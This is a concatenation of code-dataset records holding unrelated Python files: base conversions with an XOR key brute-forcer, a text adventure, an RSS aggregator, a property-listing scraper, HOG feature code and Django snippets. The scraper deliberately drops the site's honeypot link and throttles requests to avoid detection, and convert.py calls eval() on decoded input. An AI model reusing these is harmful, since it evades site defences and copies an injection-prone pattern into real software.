implemented\")\n\n return col_create_str\n\n def _make_insert_column(self, name: str, typ: str):\n if typ == 'str':\n col_create_str = f'{name} character varying(256) COLLATE pg_catalog.\"default\"'\n elif 'int' in typ:\n col_create_str = f'{name} integer'\n elif 'float' in typ:\n prec_str = \"\"\n _local = typ.split(':')\n if len(_local) == 2:\n _local = _local[1].split('.')\n if len(_local) == 2:\n prec_str = f\"({_local[0]},{_local[1]})\"\n col_create_str = f'{name} numeric{prec_str}'\n else:\n raise NotImplementedError(f\"Column type {typ} not implemented\")\n\n return col_create_str\n\n\ndef get_geo_db_service(driver: str = 'local', **kwargs) -> GeoDBService:\n \"\"\"\n\n :param driver: \n :param kwargs: Parameter for subsequence service\n :return:\n \"\"\"\n if driver == 'local':\n return LocalGeoDBService()\n else:\n return RemoteGeoPostgreSQLService(**kwargs)\n\n","sub_path":"xcube_sh/geodb.py","file_name":"geodb.py","file_ext":"py","file_size_in_byte":19765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"160284594","text":"#Nik and Cam\r\n#Base conversions\r\n\r\nimport base64\r\nimport codecs\r\nimport math\r\n\r\ndef bin2Hex(st):\r\n return hex(int(st, 2))[2:]\r\n\r\ndef bin2Base64(st):\r\n st = bin2Hex(st)\r\n return hex2Base64(st)\r\n\r\ndef bin2Plain(st):\r\n return eval(str(codecs.decode(bin2Hex(st), \"hex\"))[1:])\r\n\r\ndef hex2Bin(st):\r\n return bin(int(st, 16))[2:]\r\n\r\ndef hex2Base64(st):\r\n return codecs.encode(codecs.decode(st, 'hex'), 'base64').decode().replace(\"\\n\", \"\")\r\n\r\ndef hex2Plain(st):\r\n if len(st) % 2 != 0:\r\n st = '0' + st\r\n return eval(str(codecs.decode(st, \"hex\"))[1:])\r\n # print(st)\r\n\r\ndef base642Bin(st):\r\n hexSt = base642Hex(st)\r\n return hex2Bin(hexSt)\r\n\r\ndef base642Hex(st):\r\n return base64.b64decode(st).hex()\r\n\r\ndef base642Plain(st):\r\n hexSt = base642Hex(st)\r\n return hex2Plain(hexSt)\r\n\r\ndef plain2Bin(st):\r\n b = st.encode()\r\n return hex2Bin(codecs.encode(b, \"hex\"))\r\n\r\ndef plain2Hex(st):\r\n b = st.encode()\r\n return str(codecs.encode(b, \"hex\"))[2:-1]\r\n\r\ndef plain2Base64(st):\r\n hexSt = plain2Hex(st)\r\n return hex2Base64(hexSt) \r\n\r\n## ENCRYPT/DECRYPT\r\ndef k_decrypt(hex_str, key_lst):\r\n\r\n str_len = math.ceil(len(hex_str)/(len(key_lst[0])))\r\n # print(str_len)\r\n ret_lst = []\r\n\r\n for i in key_lst:\r\n temp_key = \"\"\r\n for j in range(str_len):\r\n temp_key += i\r\n # print(len(hex_str), len(temp_key))\r\n ret_lst.append([reverse_b_xor(hex_str, temp_key[:len(hex_str)]), i])\r\n\r\n return ret_lst\r\n\r\ndef reverse_b_xor(xord, st2):\r\n\r\n lengthst2 = len(st2)\r\n lengthxord = len(xord)\r\n\r\n # print(lengthst2, lengthxord)\r\n\r\n st2, xord = hex2Bin(st2), hex2Bin(xord)\r\n if len(st2) != 4*lengthst2:\r\n diff = 4*lengthst2 - len(st2)\r\n st2 = diff * '0' + st2\r\n if len(xord) != 4*lengthxord:\r\n diff = 4*lengthxord - len(xord)\r\n xord = diff * '0' + xord\r\n # print(len(xord), len(st2))\r\n # print()\r\n\r\n if len(st2) != len(xord):\r\n return 'Input lengths not equal'\r\n\r\n st1 = ''\r\n \r\n for x in range(len(st2)):\r\n if st2[x] == '1' and xord[x] == '1':\r\n st1 += '0'\r\n elif st2[x] == '1' and xord[x] == '0':\r\n st1 += '1'\r\n elif st2[x] == '0' and xord[x] == '1':\r\n st1 += '1'\r\n elif st2[x] == '0' and xord[x] == '0':\r\n st1 += '0'\r\n else:\r\n return 'Invalid inputs'\r\n return bin2Hex(st1)\r\n\r\n#Key Generator\r\ndef allKeys(n):\r\n\r\n hex_lst = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']\r\n \r\n if n == 1:\r\n return hex_lst\r\n else:\r\n return allKeysr(n, n - 1, [], hex_lst, hex_lst)\r\n\r\ndef allKeysr(n, c, new_lst, old_lst, hex_lst):\r\n if c == 0:\r\n return old_lst\r\n else:\r\n for i in range(len(old_lst)):\r\n for j in range(len(hex_lst)):\r\n new_lst.append(old_lst[i] + hex_lst[j])\r\n return allKeysr(n, c-1, [], new_lst, hex_lst)\r\n\r\n\r\ndef fltr(hex_str):\r\n # if hex_str == None:\r\n # return\r\n temp = \"\"\r\n for i in hex_str:\r\n if i.lower() in \"abcdefghijklmnopqrstuvwxyz !?,.;:_-'\\\"\":\r\n temp += i\r\n return temp\r\n\r\ndef getBasicFit(st):\r\n # if st == None:\r\n # return \r\n score = 0\r\n for i in st:\r\n letter = i.lower()\r\n if letter in \"zqxj\":\r\n score += 0\r\n elif letter in 'kv':\r\n score += 1\r\n elif letter in 'bpygfwmuc':\r\n score += 2\r\n elif letter in 'ld':\r\n score += 3\r\n elif letter in 'rhsni':\r\n score += 4\r\n elif letter in 'oa':\r\n score += 5\r\n elif letter == 't':\r\n score += 6\r\n elif letter == 'e':\r\n score += 8\r\n else:\r\n score += 0\r\n return score\r\n\r\ndef getAdvFit(st):\r\n # if st == None:\r\n # return\r\n score = 0\r\n n_list = ['bx', 'cj', 'cv', 'cx', 'dx', 'fq', 'fx', 'gq', 'gx', 'hx', 'jc', 'jf', 'jg', 'jq', 'js', 'jv', 'jw', 'jx', 'jz', 'kq', 'kx', 'mx', 'px', 'pz', 'qb', 'qc', 'qd', 'qf', 'qg', 'qh', 'qj', 'qk', 'ql', 'qm', 'qn', 'qp', 'qs', 'qt', 'qv', 'qw', 'qx', 'qy', 'qz', 'sx', 'vb', 'vf', 'vh', 'vj', 'vm', 'vp', 'vq', 'vt', 'vw', 'vx', 'wx', 'xj', 'xx', 'zj', 'zq', 'zx']\r\n for i in range(len(st) - 1):\r\n lt1 = st[i]\r\n lt2 = st[i + 1]\r\n if lt1.lower() + lt2.lower() in n_list or lt2.lower() + lt1.lower() in n_list:\r\n score -= 100\r\n return score\r\n\r\ndef getKey(item):\r\n return item[0][0]\r\n\r\ndef test():\r\n \r\n binStr = '11010000110010101101100011011000110111100000001'\r\n hexStr = '001fd'\r\n base64Str = 'aGVsbG8B'\r\n plainStr = \"hello\\x01\"\r\n \r\n #Test functions:\r\n # print('Binary to Test')\r\n # print(bin2Hex(binStr))\r\n # print(bin2Base64(binStr))\r\n # print(bin2Plain(binStr))\r\n # print()\r\n\r\n print('Hex to Test')\r\n # print(hex2Bin(hexStr))\r\n # print(hex2Base64(hexStr))\r\n print(hex2Plain(hexStr))\r\n # print()\r\n\r\n # print('Base64 to Test')\r\n # print(base642Bin(base64Str))\r\n # print(base642Hex(base64Str))\r\n # print(base642Plain(base64Str))\r\n # print()\r\n\r\n # print('Plain to Test')\r\n # print(plain2Bin(plainStr))\r\n # print(plain2Hex(plainStr))\r\n # print(plain2Base64(plainStr))\r\n\r\nif __name__ == \"__main__\":\r\n test()","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"104462293","text":"from room import Room\nfrom player import Player\nfrom item import Item\n\n# Declare all the rooms\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"North of you, the cave mount beckons\"),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"),\n}\n\n\n# Link rooms together\n\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\n#\n# Main\n#\n# Welcome Message\n# Make a new player object that is currently in the 'outside' room.\nprint(\"Welcome to The Adventure Game!\")\nprint(\"Please create a player to continue\")\nstartPosition = room['outside']\n\nusername = input(\"Player Name: \")\nuser = Player(str(username), startPosition)\nprint(f\"Welcome {user.name}\")\n\n# Write a loop that:\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\nplayGame = input(\"Please press yes (y) to continue or (q) to quit:\")\n\nif playGame.lower().strip() == \"y\":\n print(\"Welcome to the Adventure Game! Move foward to begin the treasure hunt!\")\n\nuserInput = input(f\"You're currently {user.current_room} press (n) to move foward:\")\n\nif userInput.lower().strip() == \"n\":\n user.current_room = user.current_room.n_to\n print(user)\n\nelif playGame.lower().strip() == \"q\":\n print(\"Game exiting\")\n exit(0)\n","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76355347","text":"import requests\nimport xml.etree.ElementTree as ET\nfrom db import DB\n\nclass Aggregate(object):\n def aggregate(self):\n database = DB()\n sources = database.get_sources()\n finalitems = []\n for url,category in sources:\n items = self.fetch_items(url)\n finalitems.extend(items)\n database.insert_news(items, category)\n\n print(len(finalitems))\n\n def fetch_items(self, url):\n items = []\n res = requests.get(url)\n content = res.text\n root = ET.fromstring(content)\n for child in root:\n #there is only one child for root --> channel\n for item in child.findall('item'):\n i = {}\n for elem in item:\n if elem.tag == 'title':\n i['title'] = str(elem.text).encode('utf-8').decode()\n if elem.tag == 'description':\n i['description'] = str(elem.text).encode('utf-8').decode()\n if elem.tag == 'link':\n i['link'] = str(elem.text).encode('utf-8').decode()\n if i:\n items.append(i)\n return items\n\n\nif __name__=='__main__':\n aggregator = Aggregate()\n aggregator.aggregate()\n","sub_path":"intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"318687041","text":"'''\nThis script creates dummy csv files, by selecting the first 10 images from the traindata and putting their features, filenames,\nindices and labels in separate csv files.\n@author: Diede Kemper\n'''\n\nimport pandas as pd\nimport csv\nfrom itertools import chain #to flatten lists\n\n#FEATURES\ndf = pd.read_csv('traindata_caffefeatures.csv', header=None, nrows=10)\ndf.to_csv('dummy_caffefeatures.csv', index=False, header=False) #save to csv\n\n#FILENAMES\nfilenames = list(df[0].values)\nmyfile = open('dummy_filenames.csv', 'wb')\nwr = csv.writer(myfile)\nwr.writerow(filenames)\n\n#INDICES\nwith open('traindata_indices.csv', 'rb') as f:\n reader = csv.reader(f)\n indices = list(reader)\n\nindices = list(chain.from_iterable(indices)) #flatten list\nindices = indices[0:9]\n\nmyfile = open('dummy_indices.csv', 'wb')\nwr = csv.writer(myfile)\nwr.writerow(indices)\n\n# LABELS\nwith open('traindata_labels.csv', 'rb') as f:\n reader = csv.reader(f)\n labels = list(reader)\n\nlabels = list(chain.from_iterable(labels)) #flatten list\nlabels = labels[0:9]\n\nmyfile = open('dummy_labels.csv', 'wb')\nwr = csv.writer(myfile)\nwr.writerow(labels)\n","sub_path":"Project2/Code/IO/code_to_create_csv_files/createDummyFiles.py","file_name":"createDummyFiles.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"319911336","text":"from urllib.request import urlopen \nfrom bs4 import BeautifulSoup \nimport pandas as pd\nimport time\n\nprop_name=[]\nlocation=[]\nprop_type=[]\ntitle_type=[]\nbedroom_no=[]\nbathroom_no=[]\nprop_size=[]\nother_info=[]\nprop_price=[]\nfail=0\n\n#To extract information of property from property page\ndef propertyfact(soup):\n prop_name.append(soup.find('h2',{\"class\":\"roboto\"}).text)\n print(str(len(prop_name))+\" \"+prop_name[-1])\n if len(prop_name)%50==0:\n time.sleep(15)\n elif len(prop_name)%100==0:\n time.sleep(60) \n elif len(prop_name)%500==0:\n time.sleep(180)\n elif len(prop_name)%1000==0:\n time.sleep(300)\n location.append(soup.find('dd',{'class':'loc_dd'}).text)\n fact=soup.find('dl',{'class':'params_dl'})\n ptype='NA'\n ttype='NA'\n bed='NA'\n bath='NA'\n size='NA'\n other='NA'\n for i in range(6):\n try:\n if fact.find_all('dt')[i].text=='Property Type':\n ptype=fact.find_all('dd')[i].text\n elif fact.find_all('dt')[i].text=='Title type':\n ttype=fact.find_all('dd')[i].text\n elif fact.find_all('dt')[i].text=='Bedrooms':\n bed=fact.find_all('dd')[i].text\n elif fact.find_all('dt')[i].text=='Bathroom':\n bath=fact.find_all('dd')[i].text\n elif fact.find_all('dt')[i].text=='Size':\n size=fact.find_all('dd')[i].text\n elif fact.find_all('dt')[i].text=='Other Info':\n other=fact.find_all('dd')[i].text\n except:\n break\n prop_type.append(ptype)\n title_type.append(ttype)\n bedroom_no.append(bed)\n bathroom_no.append(bath)\n prop_size.append(size)\n other_info.append(other)\n try:\n prop_price.append(soup.find('dd',{'class':'dd-price'}).text)\n except:\n prop_price.append(\"NA\")\n#To get all link of property in one website page \ndef propertyurl(soup):\n itemlist=soup.find('div',{'id':'list-view-ads','class':'list_view_ads'})\n propurl=[]\n for link in itemlist.find_all('h2',{'class':'list_title'}):\n for link2 in link('a'):\n propurl.append(link2.get('href',None))\n propurl.remove('https://www.mudah.my/honeypot.html')\n return propurl\n\n#To get soup file\ndef urlreader(url):\n while True:\n try:\n \n html = urlopen(url).read()\n print(\"success\")\n except:\n global fail\n fail=fail+1\n if fail>10:\n time.sleep(30)\n fail=0\n print(\"fail\")\n continue\n else:\n soup = BeautifulSoup(html, \"html.parser\")\n break\n return soup\n\n# To get url for next page until end page\ndef allpage(soup):\n test=soup.find_all('span',{'class':'non-active nohistory'})\n proppage=[]\n #print(test)\n for link in test:\n proppage.append(link.a.get('href'))\n #print(proppage)\n return proppage\n#This part not finish yet, Very scare if error, please try on jupyter first\ndef mudahscrapper(url=\"\",propertyarea=\"KL\"):\n url=url\n mainsoap=urlreader(url)\n \n #Get url\n firstpage=propertyurl(mainsoap)\n #Get fact\n for house in firstpage:\n factsoap=urlreader(house)\n propertyfact(factsoap)\n \n #URl for all page \n pagesoap=allpage(mainsoap)\n #url for property in certain page\n if len(pagesoap)!=0:\n for page in pagesoap:\n factsoap=urlreader(page)\n housesurl=propertyurl(factsoap)\n for house in housesurl:\n housesoap=urlreader(house)\n propertyfact(housesoap)\n \n mudahdata=pd.DataFrame({'Property Name':prop_name,'Property Location':location,\n 'Property Type':prop_type,'Title type':title_type,\n 'No of Bedroom':bedroom_no,'No of Bathroom':bathroom_no,\n 'Property Size':prop_size,'Bumi info':other_info,\n 'Property Price':prop_price})\n\n filename=propertyarea\n mudahdata.to_excel('mudahproperty-'+filename+'.xlsx', index=False) \n \n \nmudahscrapper(url=input(\"Please input your url: \"),propertyarea=input('City name: '))\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"311268727","text":"# -*- encoding: utf-8 -*-\nimport random, string\n\nPerfiles = (\n\t('Administrador', 'Administrador'),\n ('Vendedor', 'Vendedor'),\n ('Vendedor autorizado', 'Vendedor autorizado'),\n ('Cajero', 'Cajero'),\n ('Pedidos', 'Pedidos'),\n)\nColores = (\n ('f9f9f9', 'Default'),\n ('5090c1', 'Azul'),\n ('7d6eb0', 'Morado'),\n ('82af6f', 'Verde'),\n ('ff965c', 'Naranja'),\n ('e04140', 'Rojo'),\n ('ffc557', 'Amarillo'),\n ('ce6f9e', 'Rosa'),\n ('848484', 'Gris'), \n)\nEstatus_ticket = (\n ('Pendiente', 'Pendiente'),\n ('Cobrado', 'Cobrado'),\n ('Cortado', 'Cortado'),\n)\nEstatus_pedido = (\n ('Pendiente', 'Pendiente'),\n)\n\nPiezas = (\n ('1', '1'),\n ('2', '2'),\n ('3', '3'),\n ('4', '4'),\n ('5', '5'),\n ('6', '6'),\n ('7', '7'),\n ('8', '8'),\n ('9', '9'),\n ('10', '10'),\n ('11', '11'),\n ('12', '12'),\n)\n\ndef randomword(length):\n return ''.join(random.choice(string.lowercase) for i in range(length))","sub_path":"project/app/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"399594770","text":"# -*- coding: utf-8 -*\n\nimport numpy as np \nimport cv2\nfrom numba import njit\nimport time\n\nNUM_SECTOR = 9\nFLT_EPSILON = 1e-07\n\n\n@njit\ndef func1(dx, dy, boundary_x, boundary_y, height, width, numChannels):\n r = np.zeros((height, width), dtype=np.float32)\n alfa = np.zeros((height, width, 2), np.int32)\n\n for j in range(1, height-1):\n for i in range(1, width-1):\n c = 0\n x = dx[j, i, c]\n y = dy[j, i, c]\n r[j, i] = np.sqrt(x*x + y*y)\n\n for ch in range(1, numChannels):\n tx = dx[j, i, ch]\n ty = dy[j, i, ch]\n magnitude = np.sqrt(tx*tx + ty*ty)\n if(magnitude > r[j, i]):\n r[j, i] = magnitude\n c = ch\n x = tx\n y = ty\n\n mmax = boundary_x[0]*x + boundary_y[0]*y\n maxi = 0\n\n for kk in range(0, NUM_SECTOR):\n dotProd = boundary_x[kk]*x + boundary_y[kk]*y\n if(dotProd > mmax):\n mmax = dotProd\n maxi = kk\n elif(-dotProd > mmax):\n mmax = -dotProd\n maxi = kk + NUM_SECTOR\n\n alfa[j, i, 0] = maxi % NUM_SECTOR\n alfa[j, i, 1] = maxi\n return r, alfa\n#梯度计算,参考了https://blog.csdn.net/bisheng250/article/details/53672247\n@njit\ndef func2(dx, dy, boundary_x, boundary_y, r, alfa, nearest, w, k, height, width, sizeX, sizeY, p, stringSize):\n mapp = np.zeros((sizeX*sizeY*p), np.float32)\n for i in range(sizeY):\n for j in range(sizeX):\n for ii in range(k):\n for jj in range(k):\n if((i * k + ii > 0) and (i * k + ii < height - 1) and (j * k + jj > 0) and (j * k + jj < width - 1)):\n mapp[i*stringSize + j*p + alfa[k*i+ii,j*k+jj,0]] += r[k*i+ii,j*k+jj] * w[ii,0] * w[jj,0]\n mapp[i*stringSize + j*p + alfa[k*i+ii,j*k+jj,1] + NUM_SECTOR] += r[k*i+ii,j*k+jj] * w[ii,0] * w[jj,0]\n if((i + nearest[ii] >= 0) and (i + nearest[ii] <= sizeY - 1)):\n mapp[(i+nearest[ii])*stringSize + j*p + alfa[k*i+ii,j*k+jj,0]] += r[k*i+ii,j*k+jj] * w[ii,1] * w[jj,0]\n mapp[(i+nearest[ii])*stringSize + j*p + alfa[k*i+ii,j*k+jj,1] + NUM_SECTOR] += r[k*i+ii,j*k+jj] * w[ii,1] * w[jj,0]\n if((j + nearest[jj] >= 0) and (j + nearest[jj] <= sizeX - 1)):\n mapp[i*stringSize + (j+nearest[jj])*p + alfa[k*i+ii,j*k+jj,0]] += r[k*i+ii,j*k+jj] * w[ii,0] * w[jj,1]\n mapp[i*stringSize + (j+nearest[jj])*p + alfa[k*i+ii,j*k+jj,1] + NUM_SECTOR] += r[k*i+ii,j*k+jj] * w[ii,0] * w[jj,1]\n if((i + nearest[ii] >= 0) and (i + nearest[ii] <= sizeY - 1) and (j + nearest[jj] >= 0) and (j + nearest[jj] <= sizeX - 1)):\n mapp[(i+nearest[ii])*stringSize + (j+nearest[jj])*p + alfa[k*i+ii,j*k+jj,0]] += r[k*i+ii,j*k+jj] * w[ii,1] * w[jj,1]\n mapp[(i+nearest[ii])*stringSize + (j+nearest[jj])*p + alfa[k*i+ii,j*k+jj,1] + NUM_SECTOR] += r[k*i+ii,j*k+jj] * w[ii,1] * w[jj,1]\n return mapp\n\n@njit\n#计算四邻域的归一化\ndef func3(partOfNorm, mappmap, sizeX, sizeY, p, xp, pp):\n\tnewData = np.zeros((sizeY*sizeX*pp), np.float32)\n\tfor i in range(1, sizeY+1):\n\t\tfor j in range(1, sizeX+1):\n\t\t\tpos1 = i * (sizeX+2) * xp + j * xp\n\t\t\tpos2 = (i-1) * sizeX * pp + (j-1) * pp\n\n\t\t\tvalOfNorm = np.sqrt(partOfNorm[(i )*(sizeX + 2) + (j )] +\n \t\t\t\tpartOfNorm[(i )*(sizeX + 2) + (j + 1)] +\n \t\t\t\tpartOfNorm[(i + 1)*(sizeX + 2) + (j )] +\n \t\t\t\tpartOfNorm[(i + 1)*(sizeX + 2) + (j + 1)]) + FLT_EPSILON\n\t\t\tnewData[pos2:pos2+p] = mappmap[pos1:pos1+p] / valOfNorm\n\t\t\tnewData[pos2+4*p:pos2+6*p] = mappmap[pos1+p:pos1+3*p] / valOfNorm\n\n\t\t\tvalOfNorm = np.sqrt(partOfNorm[(i )*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i )*(sizeX + 2) + (j + 1)] +\n\t\t\t\t partOfNorm[(i - 1)*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i - 1)*(sizeX + 2) + (j + 1)]) + FLT_EPSILON\n\t\t\tnewData[pos2+p:pos2+2*p] = mappmap[pos1:pos1+p] / valOfNorm\n\t\t\tnewData[pos2+6*p:pos2+8*p] = mappmap[pos1+p:pos1+3*p] / valOfNorm\n\n\t\t\tvalOfNorm = np.sqrt(partOfNorm[(i )*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i )*(sizeX + 2) + (j - 1)] +\n\t\t\t\t partOfNorm[(i + 1)*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i + 1)*(sizeX + 2) + (j - 1)]) + FLT_EPSILON\n\t\t\tnewData[pos2+2*p:pos2+3*p] = mappmap[pos1:pos1+p] / valOfNorm\n\t\t\tnewData[pos2+8*p:pos2+10*p] = mappmap[pos1+p:pos1+3*p] / valOfNorm\n\n\t\t\tvalOfNorm = np.sqrt(partOfNorm[(i )*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i )*(sizeX + 2) + (j - 1)] +\n\t\t\t\t partOfNorm[(i - 1)*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i - 1)*(sizeX + 2) + (j - 1)]) + FLT_EPSILON\n\t\t\tnewData[pos2+3*p:pos2+4*p] = mappmap[pos1:pos1+p] / valOfNorm\n\t\t\tnewData[pos2+10*p:pos2+12*p] = mappmap[pos1+p:pos1+3*p] / valOfNorm\n\treturn newData\n\n@njit\ndef func4(mappmap, p, sizeX, sizeY, pp, yp, xp, nx, ny):\n\tnewData = np.zeros((sizeX*sizeY*pp), np.float32)\n\tfor i in range(sizeY):\n\t\tfor j in range(sizeX):\n\t\t\tpos1 = (i*sizeX + j) * p\n\t\t\tpos2 = (i*sizeX + j) * pp\n\n\t\t\tfor jj in range(2 * xp): # 2*9的有符号梯度\n\t\t\t\tnewData[pos2 + jj] = np.sum(mappmap[pos1 + yp*xp + jj : pos1 + 3*yp*xp + jj : 2*xp]) * ny\n\t\t\tfor jj in range(xp): # 9无符号\n\t\t\t\tnewData[pos2 + 2*xp + jj] = np.sum(mappmap[pos1 + jj : pos1 + jj + yp*xp : xp]) * ny\n\t\t\tfor ii in range(yp): # 4无符号\n\t\t\t\tnewData[pos2 + 3*xp + ii] = np.sum(mappmap[pos1 + yp*xp + ii*xp*2 : pos1 + yp*xp + ii*xp*2 + 2*xp]) * nx\n\treturn newData\n\n\n\ndef getFeatureMaps(image, k, mapp):#k为cell大小,返回map为特征\n\tkernel = np.array([[-1., 0., 1.]], np.float32)\n\n\theight = image.shape[0]\n\twidth = image.shape[1]\n\t#要求为3通道\n\tassert(image.ndim==3 and image.shape[2])\n\tnumChannels = 3\n\n\tsizeX = width // k\n\tsizeY = height // k\n\tpx = 3 * NUM_SECTOR\n\tp = px\n\tstringSize = sizeX * p\n\n\tmapp['sizeX'] = sizeX\n\tmapp['sizeY'] = sizeY\n\tmapp['numFeatures'] = p\n\tmapp['map'] = np.zeros((mapp['sizeX']*mapp['sizeY']*mapp['numFeatures']), np.float32)\n\t#两个方向梯度\n\tdx = cv2.filter2D(np.float32(image), -1, kernel)\n\tdy = cv2.filter2D(np.float32(image), -1, kernel.T)\n #初始化cos和sin函数\n\targ_vector = np.arange(NUM_SECTOR+1).astype(np.float32) * np.pi / NUM_SECTOR\n\tboundary_x = np.cos(arg_vector) \n\tboundary_y = np.sin(arg_vector)\n\n\t\n\t#计算像素梯度的大小和方向\n\tstime=time.time()\n\tr, alfa = func1(dx, dy, boundary_x, boundary_y, height, width, numChannels) #with @jit\n\tdtime=time.time()-stime\n\t# print('func1:{}s'.format(dtime))\n\tnearest = np.ones((k), np.int)\n\tnearest[0:k//2] = -1\n\n\tw = np.zeros((k, 2), np.float32)\n\ta_x = np.concatenate((k/2 - np.arange(k/2) - 0.5, np.arange(k/2,k) - k/2 + 0.5)).astype(np.float32)\n\tb_x = np.concatenate((k/2 + np.arange(k/2) + 0.5, -np.arange(k/2,k) + k/2 - 0.5 + k)).astype(np.float32)\n\tw[:, 0] = 1.0 / a_x * ((a_x*b_x) / (a_x+b_x))\n\tw[:, 1] = 1.0 / b_x * ((a_x*b_x) / (a_x+b_x))\n #梯度计算准备\n\tmapp['map'] = func2(dx, dy, boundary_x, boundary_y, r, alfa, nearest, w, k, height, width, sizeX, sizeY, p, stringSize) #with @jit\n\n\treturn mapp\n\n#归一化截断\ndef normalizeAndTruncate(mapp, alfa):\n\tsizeX = mapp['sizeX']\n\tsizeY = mapp['sizeY']\n\n\tp = NUM_SECTOR\n\txp = NUM_SECTOR * 3\n\tpp = NUM_SECTOR * 12\n\n\t'''\n\t### \n\tpartOfNorm = np.zeros((sizeY*sizeX), np.float32)\n\n\tfor i in range(sizeX*sizeY):\n\t\tpos = i * mapp['numFeatures']\n\t\tpartOfNorm[i] = np.sum(mapp['map'][pos:pos+p]**2) ###\n\t'''\n\t### \n\tidx = np.arange(0, sizeX*sizeY*mapp['numFeatures'], mapp['numFeatures']).reshape((sizeX*sizeY, 1)) + np.arange(p)\n\tpartOfNorm = np.sum(mapp['map'][idx] ** 2, axis=1) ### \n\n\tsizeX, sizeY = sizeX-2, sizeY-2\n\t\n\n\t\n\t### \n\tnewData = func3(partOfNorm, mapp['map'], sizeX, sizeY, p, xp, pp) \n\t###\n\n\t# \n\tnewData[newData > alfa] = alfa\n\n\tmapp['numFeatures'] = pp\n\tmapp['sizeX'] = sizeX\n\tmapp['sizeY'] = sizeY\n\tmapp['map'] = newData\n\n\treturn mapp\n\n\ndef PCAFeatureMaps(mapp):\n\tsizeX = mapp['sizeX']\n\tsizeY = mapp['sizeY']\n\n\tp = mapp['numFeatures']\n\tpp = NUM_SECTOR * 3 + 4\n\typ = 4\n\txp = NUM_SECTOR\n\n\tnx = 1.0 / np.sqrt(xp*2)\n\tny = 1.0 / np.sqrt(yp)\n\n\tnewData = func4(mapp['map'], p, sizeX, sizeY, pp, yp, xp, nx, ny) \n\t###\n\n\tmapp['numFeatures'] = pp\n\tmapp['map'] = newData\n\n\treturn mapp\n","sub_path":"FlapPyBird/fhog.py","file_name":"fhog.py","file_ext":"py","file_size_in_byte":8531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"309792795","text":"\"\"\"\nDefinition of urls for python_webapp_django.\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nfrom datetime import datetime\nfrom django.conf.urls import url\nimport django.contrib.auth.views\n\nimport app.forms\nimport app.views\nfrom django.contrib import admin\n# Uncomment the next lines to enable the admin:\n# from django.conf.urls import include\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = [\n # Examples:\n #SendAudioTrailer\n url(r'^statistics', app.views.statistics, name='statistics'), # <-- this one here\n url(r'^ajax/load_questions/', app.views.load_questions, name='load_questions'), # <-- this one here\n\n url(r'^ajax/load-cities/', app.views.load_cities, name='ajax_load_cities'), # <-- this one here\n url(r'^AshaAdd', app.views.ashaAdd, name='AshaAdd'),\n url(r'^ContentAdd', app.views.ContentAdd, name='ContentAdd'),\n url(r'^ShowAdd', app.views.ShowAdd, name='ShowAdd'),\n url(r'^TextMessageAdd', app.views.TextMessageAdd, name='TextMessageAdd'),\n url(r'^SendAudioTrailerAdd', app.views.SendAudioTrailerAdd, name='SendAudioTrailerAdd'),\n url(r'^ShowFeedbackAdd', app.views.ShowFeedbackAdd, name='ShowFeedbackAdd'),\n url(r'^ShowRecordingAdd', app.views.ShowRecordingAdd, name='ShowRecordingAdd'),\n\n url(r'^AudioFileAdd', app.views.AudioFileAdd, name='AudioFileAdd'),\n\n url(r'^ExpertAdd', app.views.ExpertAdd, name='ExpertAdd'),\n url(r'^CohortAdd', app.views.CohortAdd, name='CohortAdd'),\n url(r'^ContentCategoryAdd', app.views.ContentCategoryAdd, name='ContentCategoryAdd'),\n url(r'^$', app.views.home, name='home'),\n url(r'^contact$', app.views.contact, name='contact'),\n url(r'^about', app.views.about, name='about'),\n url(r'^admin', admin.site.urls),\n 